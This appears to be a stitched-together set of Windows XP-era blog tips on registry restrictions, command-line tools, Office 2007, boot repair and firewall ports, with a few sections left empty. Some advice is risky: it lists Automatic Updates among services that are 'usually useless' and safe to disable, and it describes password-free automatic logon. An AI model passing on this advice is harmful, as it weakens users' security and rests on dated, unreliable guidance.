[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

"NoDrives"=dword:03ffffff

2) Pop a banner each time Windows Boots :

To pop a banner which can contain any message you want to display just before a user is going to log on, go to the key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon

Now create a new string Value in the right pane named LegalNoticeCaption and enter the value that you want to see in the Menu Bar. Now create yet another new string value and name it: LegalNoticeText. Modify it and insert the message you want to display each time Windows boots. This can be effectively used to display the company's private policy each time the user logs on to his NT box. It's .reg file would be:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon]

"LegalNoticeCaption"="Caption here."

3) Secure your Desktop Icons and Settings :

You can save your desktop settings and secure it from your nerdy friend by playing with the registry. Simply launch the Registry Editor go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

In the right pane create a new DWORD Value named NoSaveSettings and modify it's value to 1. Refresh and restart for the settings to get saved.

4) Deleting System Options from the Start menu :

You can actually remove the Find and Run options from the start menu by performing a simple registry hack. Again like always Launch the registry editor and scroll down to the below key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Right-click on the right pane and select New, DWORD Value. Name it NoFind.(To remove the RUN option name it NoRun). Double-click the newly create DWORD to edit it's value and enter 1 as its value. This will disable the FIND option of the Start Menu and will also disable the default Shortcut key(F3 for Find.)

To restore the Run or find command modify the value of the DWORD to 0 or simply Delete the DWORD value.

5) Cleaning Recent Docs Menu and the RUN MRU :

The Recent Docs menu can be easily disabled by editing the Registry. To do this go to the following Key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane, create a new DWORD value by the name: NoRecentDocsMenu and set it's value to 1.

Restart Explorer to save the changes.

You can also clear the RUN MRU history. All the listings are stored in the key:

HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

You can delete individual listings or the entire listing. To delete History of Find listings go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU and delete.

6) Other Similar Useful Tricks :

Launch Regedit and go to the following Registry Key:

HKEY_CURRENT_USER/Software/Microsoft/CurrentVersion/Policies

Under this key, there will definitely be a key named explorer. Now under this explorer key we can create new DWORD values and modify it's value to 1 in order to impose the restriction. If you want to remove the Restriction, then you can simply delete the respective DWORD values or instead change their values to 0. The following is a list of DWORD values that can be created under the Explorer Key-:

NoDeletePrinter: Disables Deletion of already installed Printers

NoAddPrinter: Disables Addition of new Printers

NoRun : Disables or hides the Run Command

NoSetFolders: Removes Folders from the Settings option on Start Menu (Control Panel, Printers, Taskbar)

NoSetTaskbar: Removes Taskbar system folder from the Settings option on Start Menu

NoFind: Removes the Find Tool (Start >Find)

NoDrives: Hides and does not display any Drives in My Computer

NoNetHood: Hides or removes the Network Neighborhood icon from the desktop

NoDesktop: Hides all items including, file, folders and system folders from the Desktop

NoClose: Disables Shutdown and prevents the user from normally shutting down Windows.

NoSaveSettings: Means to say, 'Don't save settings on exit'

DisableRegistryTools: Disable Registry Editing Tools (If you disable this option, the Windows Registry

Editor(regedit.exe) too will not work.)

NoRecentDocsHistory: Removes Recent Document system folder from the Start Menu (IE 4 and above)

ClearRecentDocsOnExit: Clears the Recent Documents system folder on Exit.

Nolnternetlcon: Removes the Internet (system folder) icon from the Desktop

Under the same key: HKEY_CURRENT_USER/Software/Microsoft/CurrentVersion/Policies you can create new

subkeys other than the already existing Explorer key. Now create a new key and name it System. Under this

new key, system we can create the following new DWORD values(1 for enabling the particular option and 0 for disabling the particular option):

* NODispCPL: Hides Control Panel

* NoDispBackgroundPage: Hides Background page.

* NoDispScrsavPage: Hides Screen Saver Page

* NoDispAppearancePage: Hides Appearance Page

* NoDispSettingsPage: Hides Settings Page

* NoSecCPL: Disables Password Control Panel

* NoPwdPage: Hides Password Change Page

* NoAdminPaqe: Hides Remote Administration Page

* NoProfilePage: Hides User Profiles Page

* NoDevMgrPage: Hides Device Manager Page

* NoConfigPage: Hides Hardware Profiles Page

* NoFileSysPage: Hides File System Button

* NoVirtMemPage: Hides Virtual Memory Button

Similarly, if we create a new subkey named WinOldApp, we can add the following DWORD values under it(1 for enabling the particular option and 0 for disabling the particular option):

Disabled: Disable MS-DOS Prompt

NoRealMode: Disable Single-Mode MS-DOS.

2. Lock Windows to protect computer
You can lock Windows to protect the computer when leaving the station easily by creating a shortcut with the path rundll32.exeuser32.dll, LockWorkStation. The Windows key + L is also a shortcut to this feature.

3. Edit sysoc.inf to list all software
To show all software that can be removed from your computer (including protected Windows services), you can manually edit (using notepad for example) the sysoc.inf file located in Windows\inf\. Just remove the word hide next to the software pack.
*Note* - use this at your own risk. Removing critical components of the system will make Windows instable.

4. Windows XP comes with IPv4 and IPv6
Windows XP comes both IPv4 and IPv6 support. To enable IPv6, you can install the protocols needed with the command "ipv6 install" in the command-prompt. Then type ipv6 /? to see the options. The installation will not remove the IPv4 protocols so your current configuration will still work.

5. Access Task Manager with shortcut
To access the Task Manager easier, you can make a shortcut that points to %windir%\system32\taskmgr.exe.

6. Stop treating ZIP files like Folders
If you don't want your Windows XP to treat ZIP files like folders, you can disable this component by running regsvr32 /u zipfldr.dll at the command prompt or Run dialog. If you start missing it, you can enable it by typing regsvr32 zipfldr.dll.

7. Run program as diffrent user
You can run a program as a different user. Right click an application and select Run As command.

8. Switch users leaving applications opened
You can switch users leaving the applications opened too (*NOTE* use this only when needed since it could lead to system instability).
Go to Task Manager - processes and end the process explorer.exe. This will end only your session and not all applications. Then go to Applications tab, click New task and type runas /user:domainname\username explorer.exe. A password prompt will appear to login to the desired username. The user's session will start, with all your previously applications running.
I recommend to open first a command-line prompt and type runas /? to see all the options available.

9. Rename multiple files in Windows at once
Rename multiple files in Windows at once. Select them all, right click and select Rename. Enter the desired name. They will be renamed using what you specified, with a number in brackets to distinguish them.

10. Task kill feature in Windows
Windows has a task kill feature similar to Linux. Go to a command prompt and run the command tasklist to see running processes with PID numbers. Then type tskill to end the specific task. This forces an instant closing of the task.

11. Edit features with GPEDIT.MSC
You can edit many features by running gpedit.msc. You can add log on/log off scripts here and many features.

12. Edit accounts in the command prompt
You can edit accounts by running "control userpasswords2" at the command prompt.

13. Use systeminfo.exe to see System Information
You can use the systeminfo.exe command in the command prompt to see System Information, including all Windows updates and hotfixes.

14. Disable system services for maximum performance
There are system services that you can disable to free up the system's load. To access the interface that permits you to make changes to system's services, type services.msc and the command prompt.
This is a list of services that are *usually* useless and can be safely disabled.
Alerter
Application Layer Gateway Service,
Application Management
Automatic Updates
Background Intelligent Transfer
Clipbook
Distributed Link Tracking Client
Distributed Transaction Coordinater
Error Reporting Service
Fast User Switching Compatibility
IMAPI CD-Burning
Indexing Service

Remote Desktop Help Session Manager
Remote Registry
Secondary Logon
Smartcard
SSDP Discovery Service
Uninterruptible Power Supply
Universal Plug and Play Device Host
Upload Manager
Webclient
Wireless Zero Configuration
WMI Performance Adaptor

*NOTE*: Make sure you don't need them since some applications you're using could depend on them. If you make any application to fail by disabling any of the services, go back and enable it again.

15. Repair Windows XP by using the XP installation CD
If your system failes to start due to an error related to missing HAL.DLL, invalid Boot.ini or any other critical system boot files you can repair this by using the XP installation CD. Simply boot from your XP Setup CD and enter the Recovery Console. Then run "attrib -H -R -S" on the C:\Boot.ini file and delete it. Run "Bootcfg /Rebuild" and then Fixboot.

7 Short Tips on Word 07

These days I am busy with my Summer project, and I must say that, i might not be able to learn the Technical part of my studies, but I have learned quite a lot about Word 2007 which I use to create and generate reports. Here is a quick look at my 7 tips which I have started using them recently more often.

1. Changing page orientation :- In Word’s default settings, the width of pages is shorter than the length. To change this, Go to Page Setup –> Orientation, select the Landscape icon. You are done. You can even have Customized size from the Size box.
2. Printing selected portions of document :- Sometimes you would like to print certain portions of a document. To do this, first select the portion of the document you want a print out of. Go to the Office button –> Print. In the dialog box, check the Selection box. You can also define the Page range.
3. Applying Subscripts and Superscripts :- To apply Subscript formatting to text in a Word document, press Control + Equal Sign. To apply Superscript formatting, press Control + Shift + Plus Sign.
4. Checking the Thesaurus :- Sometimes while writing your document, you need a synonym for a word, and might have no time to log on to the Internet. Word has its own built-in thesaurus. To access it, select the word for which you need a synonym and press Shift-F7.
5. Changing the case of letters :- One of the annoying things that happen to me is that I press the Caps Lock key by mistake, and not even realize it. The result is that words that need to be in lower case end up capitalized or vice versa. To fix this, select the text and press Shift + F3 to change the case of the words. This is a toggle key that will allow you to choose between block capitals, title case and sentence case.
6. Return Font to Default format :- You are working on a document in a particular font. You use Bold or Italics, etc to change the format for a word or a phrase. Now to get back to the default font format you were working with, press Ctrl and the Spacebar together.
7. Moving paragraphs Up or Down :- To move a paragraph up in a Word file, select the paragraph and press Alt + Shift+ Up arrow. To move a paragraph down, select it, press Alt + Shift + Down arrow.

Hope these may be helpful for you in future. I have some tips on Powerpoint as well, so Stay Glued

5 tips on Powerpoint 2007

It’s been more than a year now, I have been using Powerpoint 2007 to create presentations, All thanks to my college faculties for giving us presentations to be presented every week. During this one year, I have learned a lot on how to use the features in PowerPoint 2007, and what all features are there not available in earlier versions. I have listed down these points which will be helpful to you if you ever intend to give presentation anywhere.
Smart Art

1. SmartArt :- WOW, this is truly a Wow feature by Microsoft. SmartArt got great designs and shapes to be used. The good part is that you can change colors, give pre defined color combinations, which may suite your presentation theme and your topic. They also provide you designs for special purpose like Hierarchy, process, Chain reaction and few more… It completely eliminates the requirements for those drawing tool, used to draw those flow charts.
2. Formatting Images :- Basic formatting did exist in earlier versions, but was not very interactive. The new version is much better and provides some more better and required features. Changes made to the images can be seen live, as soon as you make any changes, you do not need to apply those changes to see the effect of it. Another feature provided is to disable the image compression which in turn increases the size of presentation but also the quality remains intact. To disable image compression Go to Image options (Appears when you insert and select an image) –> Compress images –> Options, and untick “Automatically perform Basic compression on save“. From there you can also set the density of the image as per the requirements. The only problem which I came to know later on was that you need to do this again and again, for different images, as it is not a permanent change.
3. Page Setup :- It is not possible to give a presentation in a single style on all the Projectors. According to the device you are presenting on, you need to change the page setup, hence getting the most of it. We cannot present the same presentation on Plasma and on a projector, as both have different aspect ratios. To select the proper page setup, Go to View tab –> Slide Master –>Page Setup. From here choose the correct setup you want to. You can have customized sizes as well.
Page Setup

4. Custom shows :- We are used to give long presentations in short duration, and leave the deep understanding part. You have to insert that data so that everyone could read that. One way is to put notes in each and every single slide, But in notes to, everything cannot be expressed. The other way is to create a complete slide and present a Custom show. How ? Just Go to Slide show tab –> Custom Slide, and choose the slides you want to show. Simple enough.
5. Rehearse Timings :- Timings are very important for us. If we go beyond those time limits, we are bound to get reduced marks. This rehearsal tool comes in handy, where in you can practice and see if your speech matches with the presentation and time allotted. You can also set the time for slides to switch automatically when you have rehearsed, and save that rehearsal. This is one of my favorite tools which I think was needed but the there was no alternative to that.

Adding Custom Sound Event in XP

We all know how to change a sound when window starts. But what if we want to create a Custom sound event. What if we like to add a sound whenever a program is opened? Just imagine how good it would be to add a sound whenever Firefox starts, After all sometimes it takes long to open.
To add a custom sound effect, you need to open your registry, and please do not forget to backup your registry before making any changes.

1. Go to Start –> Run, type Regedit
2. Go to HKEY_CURRENT_USER\AppEvents\Schemes\Apps
3. Right Click on Apps, New –> Key
4. Name the key with the programs EXE file, like Firefox for Firefox, Winword for Office word, without the extension
5. Now on right pane, right click Default, and click Modify and type in the same application name
6. Right click on new key and create a new key, and name whatever you want to
Custom Sound
7. Go to Control Panel –> Sounds and Audio devices –> Sounds, there you should be able to see the Custom sound event you added.

You can now assign any sound event you want to.
Do try it, an great tip to personalize your system more

Orkut Apps Finally Launched in India

We had a clue that Orkut Apps will be launched in India this week, but surprises have their own impact. Yes, today Orkut Apps have been launched Here in India, after Estonia. Earlier I changed my country to Estonia so as to explore more of these Apps, but now, I can come back to India :) .

Orkut Apps

There are 18 Apps currently available, of which I was not able to explore any one fully. I just ran to an overview, but seems like people in my contact have already starting using it :) . As soon as you use these Apps, these go into the updates, and your friends are informed about it, if your “update friends” options is enabled. Apart from that, your profile to changes, and all the Apps are added in your profiles main page, which make it quite messy and long for a page.
Anyways, you can add your Apps from the Apps section (New addition) in the left pane.
Ultimately this is going to be great Orkutting experience, and I am pretty sure that all Indians are now going to spend more time on Orkut.

Create Bootable CD which Installs Additional Programs Automatically

We have already seen how to Install windows in Unattended mode, and Reinstall windows in Unattended mode. Now we will see how we can Install windows in Unattended mode, which also installs selected programs or software’s. This time we are going to take a help of a software which will allow us to achieve this. Before you carry on, make sure that you have the copy of you OS, and all other software’s ready.

This all is possible by a software named, Windows Unattended CD creator (WUCC). To run this software you need to have .Net Framework 1.1 or XP SP1 or higher.

When you open WUCC, it will simple ask you to give the source of the CD for OS files. You can give the directory either from your PC, or from a Disk. Make sure when you provide the directory path, it should be bootable. If you click “Select Target Directory” then it will write these files temporarily in this directory and thus can be deleted after you are finished. If you are providing the Directory from Hard drive of your computer, then you can select “Work in Source Directory”. You also need to provide the Name, CD key, and other details, in next 2 tabs.

WUCC

You can also add Windows Hot-fixes, Patches and updates like IE7, Media Player 11 and more, as tehy are stored in the computer, and you need to look for their executable files. For that, click on Hotfixes tab, and give the path to your patches. Similarly you can also add Drivers you want should be installed at the time of installation.

Lastly, Software’s can be added too. In the Software tab, type in a software description, and then, add the software from the directory you want to. If you don’t want to copy the program to the windows CD, check “Install Directly from the source.” You need to repeat this process for all your software applications you want to get it installed.

When everything has been done go to done tab, and here you can delete some unnecessary files, if you want. Apart from that, you can burn this image onto a CD, DVD or even can save it as an ISO image.

Go ahead, and create one for you. I have already done that for safety purpose.

Apply Wallpaper in Folder Background

When windows sees WMA files in a folder, it automatically convert that folder into Music, and thus puts up a small image in the background. That gives you an impression that it is a music folder. The same applies for a folder carrying images, and docs.

What if you want to add an image in a ordinary folder, and want to customize it with different colors and background? A software WindowPaper XP does with as ease as 1 2 3 ….

Yes, within just 3 steps, you can do all the desired changes you want to.

1. Step 1 - You select the folder.
2. Step 2 - You select image or background color, folder icon, font color.

Window Paper Xp
3. Step 3 - Implementing these changes.

That’s it, Isn’t that easy? For sure it is, no coding, no special files, just download, install and enjoy :)

Change Firefox from Great to Amazing, use All in one sidebar Add-on

All in one Sidebar(AioS) is a Firefox Add-on, that is just more than a Add-on. It completely changes the way you browse the web.

It allows us to quickly switch between sidebars and view dialog boxes. It has 6 basic icons to switch from bookmarks, downloads, History, Extensions and view source code of a page as well. It has a slide out bar, which is customizable. This add-on truly goes by its name with providing all sort of information that is required. It can be kept hidden while browsing, and can come into action with just a simple Mouse-roll.

AioS

You can also use Hotkeys to control and switch the tab. All in all, this is a complete time saver, without even interrupting you while browsing., a must have add-on.

Soople, New Way to Google

Do you think you know all the features provided by Google? Yes Or No ?? Well, what ever may be your answer, here is a good news for you all. This online tool is very easy to use and cleverly designed to get the most out of it.

Soople

Its main page is divided into 13 areas, being

You can also try OnlyJust, which does the same function, but options are limited.

Now everybody can be an expert in Google search :) , and I must thank Soople for helping me search so many projects for me

Live Search - Now Better

Microsoft has just updated the Live search for all, adding features to serve you a better experience. These newly added features are not only cool, but makes sure at you stick to live search for your search process. However it all depends on search results, but this time it fascinated me, with Google no way near it. Here is a quick look at what Microsoft has added to their package

Livesearch

* Image Search which now includes the size of images you want to see on page and an infinite scroll which will let you see even the last search results without going on to the next page. Apart from that, to enlarge an image, you need not to click it, just hover onto it and you will see its full size.
* Like Google, Live has also started the Translator services. However the services is not opened to Indian languages, but it looks looks to be a good start for them.
* Video Search which has a stunning feature where you need not to download, or open a new page to see a video, You just need to place your mouse over the video, and the video will start playing. Cool, Never thought this would come from Microsoft ;) .
* Maps and directions, which have been made somewhat similar to that of Google. You can search for any city, and Directions “From” and “To” that place, but the local business is still confined to US.

More about these services has been informed here.

6 Tips on Using Outlook Express 2007

After long thoughts, I decided to use Outlook Express 2007 for my GMail account, and I benefited a lot from it. Initially it was difficult for me to make out, which option was where, but slowly I was able to search for it, and started using it. Most of us don’t use Outlook Express, even if it is installed in our computers. However, after I started working on it, I was able to make lots of changes and make it more friendly to my nature of work. Here are these tips you can use

1. More Onscreen space - I have already talked about increasing the working space in PowerPoint 2007, the same applies here as well. You can get more onscreen space by minimizing the navigation pane. This makes screen more clean and tidy. To do so, you need to click the arrow on top of the navigation pane, which then minimizes the navigation pane. It will get minimized to a sleek vertical bar, and all the icons like Mail, Calendar, Contacts, Tasks and more are available. However more number of shortcuts can be added and removed easily.
More Onscreen Space
2. E-mail signature in Outlook - In GMail, you cannot have HTML signatures, but if you are using Outlook Express, you can have this feature as well. To create a HTML signature Go to the Tools –> Options –> Mail Format. There go to Signatures section and click new, and name it. Type in the desired email signature and apply HTML editing.
3. Colored Tasks - We know how important colors are in setting up the mood of a person. Colors are also important to let us know the importance, as we do the same in Tasks. When you add a task in calendar, right click on it and click “Categorize” and give the color category. You can add more colors, shortcuts to these colors, and also you can make a Quick Click feature which will add a task to that category whenever clicked.
Colored Tasks
4. Flag Mails - Flagging mails means that you want to read them later or take some action. Well in case you flag a message in Outlook Express, it will add this to your To-Do list immediately, and in case you want to change the day and date of action, that can be done as well with the follow up feature. Apart from that, a great feature wherein a Flag can be created for the recipients as well, where you need to give details when this mail needs to be taken action on. This mail will automatically be added in the To-Do list of that person. This works only if the recipient is also using Outlook Express.

5. Change the Font size of your message list - Sometimes you have to strain eyes to read email headers. Well we can change the font and size to make it easy for us. To do so click on the View –> Current View –> Customize Current View. Now click on Other Settings and Select Row Fonts and change the font to the one that you desire. Click OK, and it’s done.
6. Changing Reading Pane - In earlier versions of Outlook and Outlook Express, the reading pane used to be in different alignment, as it is now. Some people find the earlier version much easier to navigate, as I find the same :) . To change it, Go to View –> “Reading Pane” and select your view. You can turn it off as well. The best thing is that for every individual folder, the settings can be different. Also you can drag and adjust the height or width of the pane.

See how simple it can be to use Outlook Express 2007, Do give it a try, and I am sure you will never run away from using Outlook Express, even if you are using it in an organization.

Graphita - Add great effect to your pictures

There are many tools available which can add some good effects to your images, but most of them either add graphics, text or some other service. What if an online tool provides you all these, and beyond that much more then you can even think of.

Graphita Live Studio , provides you all this, that too FREE of cost. You can add cool graphics, different brushes, text captions and more. Each and every object that you add, can be modified upto some extent. If you are a registered user (Free registration) you get some more graphics to work with. One of the best features I liked is that one can upload images directly via Flickr.
This is a nice tool to play around, but does its work neatly
Its not a PhotoShop replacement, but it is much closer to what work it does, what else you want from a free service guys ;) .
Most of us are not aware of what a Blue Screen Of Death is Or better known as BSOD is. Well a Blue Screen Of Death is nothing but a blue screen error many of us face while working on windows. Why Microsoft named it so, any clue? If you get, let me know as well. I have been searching for this answer for long now :) .
This screen can appear for many reasons, and a final answer to how it can be stopped has not been found yet. Either you make any changes or not, you just cannot say when you face this issue. But in case a faulty Device driver, hardware error etc. could cause these screens to come up further more often. One of readers Viky, asked me about the same issue, as he was facing the same. He was getting the error DRIVER_IRQL_NOT_LESS_OR_EQUAL, and Dumping Physical memory to Disk.

In this case, Viky had a problem with the network card, as he already told me, and rest was understandable by the Error code he was facing. He had a problem with the driver of the network card, and Reinstalling it or Upgrading it solved the issue.
There may be other different error codes which could make your system face this issue. What should you do when you face this BSOD.

* Firstly Don’t panic and check what new upgrades have been done to the system, in terms of both hardware and software.
* Once done that, write down the error code you see, and check the possible reason for it provided here by Microsoft.
* After that, check when you possibly face the issue, like while opening a particular file or using any particular hardware device, like in above case, Network card.
* After that, match step 2 and 3, and come to a solution.

This should solve almost all the BSOD error messages.
If in future, you face this issue, do remember this post by giving it a Digg or a Stumble.

PhotoSynth - The New Way to View Photos

PhotoSynth is a new concept introduced by Microsoft, which in reality change the way one think and feels about photos. This new software takes large number of images, and look for similarities in these photographs, to create a complete 3 Dimensional look. This technology allows you to

* Walk or fly through a scene to see photos from any angle
* Seamlessly zoom in or out of a photo whether it’s megapixels or gigapixels in size
* See where pictures were taken in relation to one another
* Find similar photos to the one you’re currently viewing
* Send a collection - or a particular view of one - to a friend

Microsoft actually achieves by symbolizing each and every structure by series of dots, and then these are matched with other images, so that they can be compiled together to give that look. Photosynth can also identify the depth at which picture is taken, because each and every camera has different aperture and zoom. You can walk into 3D as well, and the best part being you can zoom into it infinitely.
This can completely change the way the 3D world is today. You must at least once try it out. To view the PhotoSynth in action, you need to install the software from Here

Boot XP from an External device

Hello guys, It’s Readers Query time again. This time one of our reader, Anju, faced a problem of missing Boot.ini file. The computer was not able to boot because it was not able to find the proper location of the boot files, thus creating a problem. But for this simple reason, you cannot format your computer, and when you know its just a small file. What can then be done?
Usually when this file is deleted, it automatically rewrites a new file, and this booting the system. But in this case, it was not. Whats the solution then ?

Well, to this problem what can be done is booting XP from a external device, be it Floppy, Pen drive or even a Disk. You just need to copy the booting files into these devices, and all is then controlled by XP.
You need to have a second computer, in case your computer is down too. But if it is healthy and doing good, prepare a copy NOW !!!

Firstly format your device like Floppy, or Pen drive in a FAT File system, and then copy “ntldr” and “ntdetect.com” files from the i386 folder of XP disk. Then you need to copy your Boot.ini file to the drive to make it bootable.
If in case you need to write the whole code of this file, Follow this small tutorial for the same.
That’s it You can then boot your computer from any external device.

Adding a Port Or Program In Windows Xp SP2 Firewall

if you are using Windows Xp SP2, and your firewall is Enabled, then sometimes you must have faced a problem of blocked sites, and firewall doesn’t allow you further to access it. Same happens with some of the softwares like SKYPE. Also some sites require some specific ports to be opened so as to transmit data. What in that case can you do. Well the simple thing is to add Ports. Let’s see how to make changes.

1. Go to Start –> Run, type firewall.cpl.
2. Click on Exception Tab, and untick the service you are not able to use. After you save changes you will be able to use those Softwares
3. Sometimes you might not see a particular software in that list. In that case Click Add Program button.
4. List of all the Installed softwares is shown and you need to select your service to add it up and activate it.
5. In case of opening a port, Click Add Port and give any name and the port numbers you want to add.

That’s it, you are done with editing your firewall. In future if you face any problem with Windows firewall, remember its very easy to edit with. Even if you play with it, it can be repaired, but don’t play too much ;) .

Adding Drive to the SendTo List

I have recently found that if you want to send something from A: drive or from any where to any drive, you can just make a short cut of that drive in subdirectory SENDTO.

For example I have two hard drives, a Floppy Drive, and a CDROM

After I have make a copy of each of my drive I will be able to send a whole directory of E:\XXX from the CDROM drive to A: drive or any other drive that i have had made the short c t in the SENDTO subdir of WINDOWS.

Adding the Device Manager to your Desktop

Adding the Device Manager to your Desktop

This allows you to quickly see all the devices attached to your computer.
I use it a lot to select Refresh when I add new external SCSI devices that were not
powered up at startup. This way you do not need to restart the computer. To add the Device Manager Icon:

1. Right click on an open area of your desktop
2. Select New / Shortcut
3. Type in C:\WINDOWS\CONTROL SYSDM.CPL, SYSTEM, 1
4. Replace C:\WINDOWS with whatever directory you installed Windows95
5. Click on the Next box
6. At the next dialog box type in Device Manager
7. Click on the Finish when you are done

Note: Replacing the 1 with a 3 will bring up the Performance Status

“Automated System Recovery

1. Firstly you need to create a backup of your system. Go to the backup utility, and click “Automated system Recovery Wizard“, and you the wizard will come up
2. Just follow the wizard, give the path name and then save the back up file
3. Once the disk backup is done, it will prompt you to insert a Floppy disk

ASR - Floppy disk
4. Once the floppy is ready, your ASR disk is ready to be used whenever required

If in case your system needs to be recovered, You will be required with OS disk, ASR disk, and the Backup file.

1. Insert the OS disk, and boot from the disk
2. Press F2 when setup says “Press F2 to run Automated system recovery“
3. Setup will then ask you to insert the ASR floppy disk and will then Run the ASR process, which is almost the installation of XP
4. After the Process is complete, you can then backup the files using the backup saved

P.S. Make sure that the Backup is on other drive, partition or any optical drive.

“Show Hidden Files and Folders” not Working ???

1. Go to Start –> Run, type Regedit
2. Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Advanced\Folder\Hidden\SHOWALL
3. In the right pane, look for key “CheckedValue” and change the value to “1“
4. Also look for key that says “DefaultValue” and change its value to “2“

Show Hidden files Reg Key

When I tried this on my machine with changes values, i could see the effect, fortunately all the values were correct, and this time I did took a backup of my registry ;)

Does Your Drive Not Open on Double Click

1. Go to Start –> Run, Type Regedit
2. Go to HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell
3. In the Right pane, Change the Only value there “Default” to “None“

This Solved the issue. If you are facing this problem too, you can try this and thus get your problem solved.

Open Explorer to the Directory you want

If you want to create a shortcut that will open the desired folder in explorer, then here is a small trick for you all. Just by including the path, this can be achieved.

1. Right click on Desktop, and go to New –> Shortcut
2. On the shortcut location type in “%SystemRoot%\explorer.exe /n, /e, C:/abhi“

Add Information and Image in My Computer

When you open properties of My computer, what all information do you see? Most common things are OS details under System, Registered to “Your name”, and Processor and Ram details under Computer.

What if you want to add more information? Yes, more information can be added to the My Computer properties. How?
Well I must tell you it is very very easy to do this, and believe me this is as simple as Cut Copy Paste
Here is what you need to do

Changing the clock to 24-Hour Time

Windows Secrets

Windows Secrets

You've read the reviews and digested the key feature enhancements and operational changes. Now it's time to delve a bit deeper and uncover some of Windows XP's secrets.

1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went
between boots, XP is positively proud of its stamina.
Go to the Command Prompt in the Accessories menu from the All programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep
these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type ' gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move
deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some
may stop your computer behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do
the same.

4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file windows/inf/sysoc.inf,
search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and eventtriggers' for creating and watching system events, 'typeperf' for monitoring
performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.

6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin
your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother.

7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.

8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.

9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.

10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by
going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.

11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The
trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the
bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the
box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and
Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description
for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during
network traffic.

16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.

18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

